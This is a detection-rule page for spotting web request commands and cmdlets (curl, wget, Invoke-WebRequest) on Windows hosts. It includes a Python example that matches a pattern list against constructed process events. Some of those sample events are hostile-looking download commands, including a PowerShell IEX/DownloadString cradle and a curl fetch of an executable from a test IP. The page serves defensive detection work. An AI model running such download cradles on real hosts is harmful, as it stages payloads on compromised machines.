
Usage Of Web Request Commands And Cmdlets

Sigma Rules

Summary
This detection rule identifies potentially suspicious use of web request commands and cmdlets on Windows hosts, as seen in command-line and PowerShell invocations. It targets commands and their aliases that fetch content from the web, a common adversary step for staging tooling or a second-stage payload on a compromised host (the same commands can also push data out, so exfiltration is a secondary concern). Detection works on process creation events: the command line is checked for known web request patterns such as `curl`, `Invoke-WebRequest`, `wget` and others, together with the Windows PowerShell cmdlets that issue web requests. Note that in Windows PowerShell 5.1 `curl`, `wget` and `iwr` are all aliases of `Invoke-WebRequest`, and a native `curl.exe` ships with Windows 10 since version 1803, so the same download can appear under several different command lines; matching on the short aliases is what makes the rule catch them. Because PowerShell is so widely used, these commands are also common in legitimate administration: expect false positives, and tune with filters on parent process, user or destination rather than disabling the rule. Matches are mapped to the Execution tactic.
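To show how a Sigma `CommandLine|contains` selection of this kind behaves, here is an added example (not the rule's own selection list and not code from the Sigma project) that runs a simplified version of the matching over a few constructed process creation events. The pattern list is an assumption built from the commands the summary names plus the `iwr`/`irm` aliases and `Net.WebClient` download methods; the trailing spaces on the short aliases, the `ExampleMgmt` agent filter and the 203.0.113.x addresses are illustrative choices, not part of the published rule.

```python
"""Sigma-style 'contains' matching for web request commands over constructed
process creation events (Sysmon EID 1 / Security 4688 style fields).

Illustrative example: the pattern set, filter and sample events are assumptions,
not the published rule's exact content.
"""
from __future__ import annotations

from dataclasses import dataclass

# Assumed pattern list. Sigma 'contains' is case-insensitive, so the trailing
# space on the short aliases is what stops 'curl ' from matching 'curlyfries'.
WEB_REQUEST_PATTERNS: tuple[str, ...] = (
    "Invoke-WebRequest",
    "Invoke-RestMethod",
    "iwr ",
    "irm ",
    "curl ",
    "wget ",
    "Net.WebClient",
    "DownloadString",
    "DownloadFile",
)

# Hypothetical tuning filter: a management agent that legitimately pulls scripts.
FILTER_PARENT_SUFFIX = r"\ExampleMgmt\agent.exe"


@dataclass(frozen=True)
class ProcessCreationEvent:
    image: str
    command_line: str
    parent_image: str


def matched_patterns(event: ProcessCreationEvent) -> list[str]:
    """Return the patterns that hit, in rule order (Sigma 'contains' semantics:
    case-insensitive substring, any-of)."""
    haystack = event.command_line.lower()
    return [p for p in WEB_REQUEST_PATTERNS if p.lower() in haystack]


def evaluate(event: ProcessCreationEvent) -> bool:
    """condition: selection and not filter_mgmt_agent (ParentImage|endswith)."""
    selection = bool(matched_patterns(event))
    filter_mgmt_agent = event.parent_image.lower().endswith(FILTER_PARENT_SUFFIX.lower())
    return selection and not filter_mgmt_agent


def run_rule(events: list[ProcessCreationEvent]) -> list[tuple[int, list[str]]]:
    """Index and matched patterns for every event that survives the filter."""
    return [(i, matched_patterns(e)) for i, e in enumerate(events) if evaluate(e)]


# Constructed sample events; none of these are real telemetry.
SAMPLE_EVENTS = [
    ProcessCreationEvent(  # classic download cradle spawned from Office
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
        ".DownloadString('http://203.0.113.10/a.ps1')\"",
        r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    ),
    ProcessCreationEvent(  # native curl.exe via cmd
        r"C:\Windows\System32\cmd.exe",
        r"cmd.exe /c curl -o C:\Users\Public\x.exe http://203.0.113.10/x.exe",
        r"C:\Windows\explorer.exe",
    ),
    ProcessCreationEvent(  # PowerShell alias of Invoke-WebRequest
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        'powershell.exe -c "iwr http://203.0.113.10/p -OutFile p.txt"',
        r"C:\Windows\System32\cmd.exe",
    ),
    ProcessCreationEvent(  # benign, unrelated process
        r"C:\Windows\System32\notepad.exe",
        r"notepad.exe C:\Users\alice\notes.txt",
        r"C:\Windows\explorer.exe",
    ),
    ProcessCreationEvent(  # contains 'curl' as a substring only; must not match
        r"C:\tools\curlyfries.exe",
        r"C:\tools\curlyfries.exe --serve",
        r"C:\Windows\explorer.exe",
    ),
    ProcessCreationEvent(  # legitimate use by the hypothetical agent; filtered out
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -NoProfile -Command Invoke-WebRequest -Uri "
        r"https://intranet.example.test/agent.ps1 -OutFile C:\ProgramData\agent.ps1",
        r"C:\Program Files\ExampleMgmt\agent.exe",
    ),
]


if __name__ == "__main__":
    for idx, hits in run_rule(SAMPLE_EVENTS):
        print(f"event {idx}: {hits} <- {SAMPLE_EVENTS[idx].command_line}")
```

Events 0, 1 and 2 fire; event 4 shows why the aliases carry a trailing space, and event 5 shows the kind of parent-process filter that keeps a known agent from paging the SOC without suppressing the same cmdlet launched from an Office document.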
Categories
  • Endpoint
  • Windows
Data Sources
  • Command
  • Process
Created: 2019-10-24